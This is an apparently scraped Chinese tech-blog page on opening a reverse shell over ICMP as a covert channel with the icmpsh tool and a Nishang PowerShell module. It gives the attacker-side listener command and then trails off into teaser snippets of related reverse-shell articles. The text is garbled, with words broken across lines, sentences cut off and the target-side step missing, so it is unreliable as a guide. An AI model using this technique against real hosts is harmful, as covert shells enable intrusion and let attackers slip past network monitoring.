通過ICMP協議反彈SHELL並執行命令

2021-08-20 05:28:04 字數 1094 閱讀 1400

因此,為了獲得shell並在目標主機上執行命令,可以使用icmp協議作為隱藏通道進行連線。

)開發了乙個自動化過程的指令碼。此指令碼所需的唯一輸入是目標主機的

ip位址。該指令碼包含在

icmpsh(

中。工具有多個選項

的命令和控制。

在nishang

框架中包含乙個

powershell

模組,可以與

icmpsh python

指令碼結合使用,以獲取

icmp

上的shell

。在主機上,執行下面命令將會開始監聽

icmp

資料報。

./icmpsh_m.py 192.168.100.3 192.168.100.4
在目標主機上,

這個鏈結將會返回給主機乙個shell

原文:

使用ICMP協議反彈shell

icmpsh是乙個簡單的反向icmp shell,與其他類似 shell的工具相比,他的主要優勢在於它不需要管理許可權即可執行到目標計算機上,畢竟icmp協議誰都可以用。準備兩台虛擬機器 kali.2020 192.168.244.128 windows server 2008 192.168.13...

ICMP協議和ICMP協議

一 icmp協議 因為ip協議不提供可靠的傳輸服務,也不提供端到端或點到點的確認,如果出錯可以通過icmp報告來看,它是在ip模組中實現。tcp ip協議設計的icmp協議就是為了彌補ip協議的不足。它是tcp ip協議族的乙個子協議,用於在ip主機 路由器之間傳遞控制訊息。控制訊息指網路通不通 主...

反彈shell集錦

就是控制端監聽在某tcp udp埠,被控端發起請求到該埠,並將其命令列的輸入輸出轉到控制端。reverse shell與telnet,ssh等標準shell對應,本質上是網路概念的客戶端與服務端的角色反轉。通常用於被控端因防火牆受限 許可權不足 埠被占用等情形 假設我們攻擊了一台機器,開啟了該機器的...